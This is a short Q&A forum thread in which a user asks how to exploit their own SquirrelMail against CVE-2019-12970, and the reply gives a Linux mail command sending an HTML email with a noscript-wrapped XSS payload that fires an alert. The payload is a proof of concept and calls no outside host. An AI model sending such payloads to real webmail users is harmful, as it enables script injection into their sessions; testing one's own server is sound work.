0 votes
How can I exploit my SquirrelMail against this CVE-2019-12970?
by (145 points)

1 Answer

0 votes

To exploit this you need to use the Linux mail command. Like this

mail -a "Content-type: text/html" -s "My little pony" \
        [email protected] <<EOD
<html><head></head><body>
<noscript>
<p title="</noscript><img src=x onerror=alert(2)>"></p>
</noscript>
</body></html>
EOD

by (184 points)
...